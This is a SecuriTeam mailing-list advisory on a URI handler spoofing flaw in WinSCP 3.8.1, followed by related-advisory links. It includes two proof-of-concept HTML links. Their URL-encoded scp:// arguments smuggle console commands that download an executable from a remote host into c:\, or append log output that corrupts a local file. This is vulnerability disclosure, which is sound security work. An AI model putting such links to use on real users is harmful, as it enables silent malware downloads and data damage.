[NT] WinSCP - URI Handler Spoofing



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



WinSCP - URI Handler Spoofing
------------------------------------------------------------------------


SUMMARY

" <http://winscp.net/> WinSCP is an open source freeware SFTP client for
Windows using SSH. "

Improper handling of a URI allows attackers to upload, download and
execute arbitrary files without user intervention.

DETAILS

Vulnerable Systems:
* WinSCP version 3.8.1

During a typical installation of winscp several URI handlers are installed
(scp:// sftp://). It is possible to include additional command line
switches to be passed to winscp

Some of these switches may initiate a file transfer, sending a specified
file to an arbitrary ftp. or they may download executables to a location
on a pc where they would be executed. eg. the startup folder

Attackers can create and html page with the content of:

<a
href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>

When a user will click on the link it would automatically download
malware.exe to a c:\ (assuming the host is in the cache otherwise user
interaction is required).

By clicking on

<a href="scp://jelmer@xxxxxxxxx:22/%22%20%22/log=c:%5csomefile%22"log</a>

would append log output to c:\somefile possibly rendering the file
unusable in the process.

Note that this also works when the host is not in the cache


ADDITIONAL INFORMATION

The information has been provided by <mailto:jkuperus@xxxxxxxxx> Jelmer
Kuperus.
The original article can be found at:
<http://www.frsirt.com/english/reference/13286>
http://www.frsirt.com/english/reference/13286



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] WinSCP URL Protocol Handler Flaw
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WinSCP URL Protocol Handler Flaw ... automatically download files from a remote server to the local system. ... 24-Jul-2007 Vulnerability reported to Martin Prikryl ...
    (Securiteam)
  • [NT] WinSCP Denial of Service
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... a link that will cause WinSCP to crash. ... the user to visiting a web site he controlled or opening an HTML e-mail he ...
    (Securiteam)
  • [NT] Multiple Vendor Insecure use of CreateProcess()
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Improper use of Windows API command CreateProcess allows attackers to ... until a module is encountered to execute. ... This creates a scenario whereby arbitrary code could be executed. ...
    (Securiteam)
  • [NT] Switch Off Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Stack-based Buffer Overflow: ... execute arbitrary code on the remote system - possibly with SYSTEM ... boundaries until the ecx register reaches zero (where the ecx was the ...
    (Securiteam)
  • [UNIX] Snif File Disclosure Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... attackers to download files that reside outside the bound HTML root ... // this handles the download requests ... 25 November 2003 - Vendor Contacted ...
    (Securiteam)